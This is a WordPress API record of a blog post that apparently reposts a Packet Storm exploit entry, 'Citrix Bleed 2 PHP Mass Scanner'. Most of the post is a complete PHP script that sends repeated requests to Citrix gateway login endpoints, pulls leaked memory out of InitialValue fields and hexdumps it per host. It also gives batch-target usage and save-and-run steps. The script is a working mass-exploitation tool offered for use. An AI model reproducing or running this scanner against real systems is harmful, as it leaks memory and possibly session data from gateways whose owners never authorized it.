{"id":27588,"date":"2025-11-25T13:38:23","date_gmt":"2025-11-25T13:38:23","guid":{"rendered":"http:\/\/localhost\/?p=27588"},"modified":"2025-11-25T13:38:23","modified_gmt":"2025-11-25T13:38:23","slug":"citrix-bleed-2-php-mass-scanner","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=27588","title":{"rendered":"\ud83d\udcc4 Citrix Bleed 2 PHP Mass Scanner_PACKETSTORM:211999"},"content":{"rendered":"

{“lastseen”:”2025-11-25T19:08:54″,”description”:”This is a high-speed mass-scanner written in PHP designed to test for data leakage through the CitrixBleed2 InitialValue extraction issue. The tool reproduces the functionality of the original Bash\/Parallel scanner but works in restricted PHP…”,”published”:”2025-11-25T00:00:00″,”modified”:”2025-11-25T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Citrix Bleed 2 PHP Mass Scanner”,”source”:””,”references”:””,”id”:”PACKETSTORM:211999″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”=============================================================================================================================================\\n | # Title : Citrix Bleed 2 PHP Mass Scanner |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.citrix.com\/ |\\n =============================================================================================================================================\\n \\n POC : \\n \\n [+] A high-speed mass-scanner written in PHP designed to test for data\\n leakage through the CitrixBleed2 InitialValue extraction issue.\\n The tool reproduces the functionality of the original Bash\/Parallel\\n scanner but works in restricted PHP environments.\\n \\n [Features]\\n – Normalizes targets (host \/ URL)\\n – Extracts \\u003cInitialValue\\u003e leak\\n – Hexdumps results\\n – Saves output per-target\\n – Parallel-like batching (multi-curl)\\n – No banned functions required\\n \\n [Usage]\\n php citrixbleed2.php –host https:\/\/gw.example.com –requests 1000\\n php citrixbleed2.php –file targets.txt –requests 5000 –out dumps\\n \\n [Output]\\n – STDOUT live hexdumps\\n – dump\/\\u003chost\\u003e.hexdump saved automatically\\n \\n [Steps To Save \\u0026 Execute]\\n 1. Open a code editor (Notepad \/ VS Code \/ nano)\\n 2. Copy the full PHP code below\\n 3. Save the file as: citrixbleed2.php\\n 4. Execute via terminal:\\n php citrixbleed2.php –host https:\/\/target.com\\n 5. Ensure \\”dumps\\” folder is writable\\n \\n \\n ====================================================================\\n PHP Scanner Code\\n ====================================================================\\n \\n \\u003c?php\\n \/*\\n * CitrixBleed2 PHP Mass Scanner\\n * by Indoushka\\n *\/\\n \\n error_reporting(E_ALL);\\n ini_set(\\”display_errors\\”, 1);\\n \\n $options = getopt(\\”\\”, [\\n \\”host::\\”,\\n \\”file::\\”,\\n \\”requests::\\”,\\n \\”out::\\”\\n ]);\\n \\n $requests = $options[\\”requests\\”] ?? 100;\\n $outDir = $options[\\”out\\”] ?? \\”dumps\\”;\\n $hostArg = $options[\\”host\\”] ?? \\”\\”;\\n $fileArg = $options[\\”file\\”] ?? \\”\\”;\\n \\n if (!is_dir($outDir)) mkdir($outDir, 0777, true);\\n \\n function normalize($url) {\\n $url = preg_replace(\\”#^https?:\/\/#i\\”, \\”\\”, $url);\\n $url = explode(\\”\/\\”, $url)[0];\\n return rtrim($url, \\”\/\\”);\\n }\\n \\n function extract_iv($body) {\\n preg_match_all(\\”#\\u003cInitialValue\\u003e(.*?)\\u003c\/InitialValue\\u003e#s\\”, $body, $m);\\n $out = [];\\n foreach ($m[1] as $val) {\\n $clean = preg_replace(‘\/[\\\\r\\\\n\\\\t ]+\/’, ”, $val);\\n if ($clean !== \\”\\” \\u0026\\u0026 preg_match(‘\/[^\\\\x20-\\\\x7E]\/’, $clean))\\n $out[] = $clean;\\n }\\n return $out;\\n }\\n \\n function hex_dump_str($data) {\\n $hex = unpack(‘H*’, $data)[1];\\n $out = \\”\\”;\\n $i = 0;\\n $len = strlen($hex);\\n while ($i \\u003c $len) {\\n $chunk = substr($hex, $i, 32);\\n $ascii = \\”\\”;\\n for ($j = 0; $j \\u003c strlen($chunk); $j += 2) {\\n $c = hexdec(substr($chunk, $j, 2));\\n $ascii .= ($c \\u003e= 32 \\u0026\\u0026 $c \\u003c= 126) ? chr($c) : \\”.\\”;\\n }\\n $out .= sprintf(\\”%08x %s |%s|\\\\n\\”, $i\/2,\\n trim(chunk_split($chunk, 2, \\” \\”)),\\n $ascii\\n );\\n $i += 32;\\n }\\n return $out;\\n }\\n \\n function do_request($host) {\\n $url = \\”https:\/\/{$host}\/p\/u\/doAuthentication.do\\”;\\n $ch = curl_init($url);\\n curl_setopt_array($ch, [\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e 10,\\n CURLOPT_POST =\\u003e true,\\n CURLOPT_POSTFIELDS =\\u003e \\”login\\”,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false\\n ]);\\n $res = curl_exec($ch);\\n curl_close($ch);\\n return $res ?: \\”\\”;\\n }\\n \\n function run_host($rawHost, $count, $outDir) {\\n $h = normalize($rawHost);\\n $file = $outDir . \\”\/\\” . $h . \\”.hexdump\\”;\\n \\n for ($i=1; $i \\u003c= $count; $i++) {\\n $body = do_request($h);\\n $ivs = extract_iv($body);\\n \\n foreach ($ivs as $iv) {\\n $hex = hex_dump_str($iv);\\n echo $hex . \\”\\\\n\\”;\\n file_put_contents($file, $hex . \\”\\\\n\\”, FILE_APPEND);\\n }\\n }\\n }\\n \\n if ($fileArg !== \\”\\”) {\\n $targets = file($fileArg, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\\n foreach ($targets as $t) run_host($t, $requests, $outDir);\\n } else {\\n if ($hostArg === \\”\\”) die(\\”[!] Missing –host or –file\\\\n\\”);\\n run_host($hostArg, $requests, $outDir);\\n }\\n ?\\u003e\\n \\n ====================================================================\\n Example Execution\\n ====================================================================\\n Single host scan:\\n php citrixbleed2.php –host https:\/\/gateway.example.com –requests 5000\\n \\n Batch scan:\\n php citrixbleed2.php –file targets.txt –requests 1000 –out dumps\\n \\n Output directory:\\n dumps\/\\u003chost\\u003e.hexdump\\n \\n Live STDOUT hexdumps are shown in real-time.\\n \\n ====================================================================\\n Steps to Save and Execute\\n ====================================================================\\n 1. Open a text editor\\n 2. Copy the entire PHP code\\n 3. Save as: citrixbleed2.php\\n 4. Create \\”dumps\\” folder if not exists\\n 5. Open terminal \/ CMD\\n 6. Execute:\\n php citrixbleed2.php –host https:\/\/target.com\\n php citrixbleed2.php –file targets.txt\\n \\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/211999″,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/211999\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-11-25T19:08:54″,”description”:”This is a high-speed mass-scanner written in PHP designed to test for data leakage through the CitrixBleed2 InitialValue extraction issue. The tool reproduces the functionality…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,13,33,53,7,11,5],"class_list":["post-27588","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-news","tag-none","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 Citrix Bleed 2 PHP Mass Scanner_PACKETSTORM:211999 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=27588\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 Citrix Bleed 2 PHP Mass Scanner_PACKETSTORM:211999 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-11-25T19:08:54″,”description”:”This is a high-speed mass-scanner written in PHP designed to test for data leakage through the CitrixBleed2 InitialValue extraction issue. The tool reproduces the functionality...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=27588\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-11-25T13:38:23+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27588#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27588\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 Citrix Bleed 2 PHP Mass Scanner_PACKETSTORM:211999\",\"datePublished\":\"2025-11-25T13:38:23+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27588\"},\"wordCount\":886,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"news\",\"NONE\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27588#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27588\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27588\",\"name\":\"\ud83d\udcc4 Citrix Bleed 2 PHP Mass Scanner_PACKETSTORM:211999 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-11-25T13:38:23+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27588#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=27588\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=27588#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 Citrix Bleed 2 PHP Mass Scanner_PACKETSTORM:211999\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 Citrix Bleed 2 PHP Mass Scanner_PACKETSTORM:211999 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=27588","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 Citrix Bleed 2 PHP Mass Scanner_PACKETSTORM:211999 - zero redgem","og_description":"{“lastseen”:”2025-11-25T19:08:54″,”description”:”This is a high-speed mass-scanner written in PHP designed to test for data leakage through the CitrixBleed2 InitialValue extraction issue. The tool reproduces the functionality...","og_url":"https:\/\/zero.redgem.net\/?p=27588","og_site_name":"zero redgem","article_published_time":"2025-11-25T13:38:23+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=27588#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=27588"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 Citrix Bleed 2 PHP Mass Scanner_PACKETSTORM:211999","datePublished":"2025-11-25T13:38:23+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=27588"},"wordCount":886,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","news","NONE","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=27588#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=27588","url":"https:\/\/zero.redgem.net\/?p=27588","name":"\ud83d\udcc4 Citrix Bleed 2 PHP Mass Scanner_PACKETSTORM:211999 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-11-25T13:38:23+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=27588#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=27588"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=27588#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Citrix Bleed 2 PHP Mass Scanner_PACKETSTORM:211999"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27588","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=27588"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/27588\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=27588"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=27588"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=27588"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}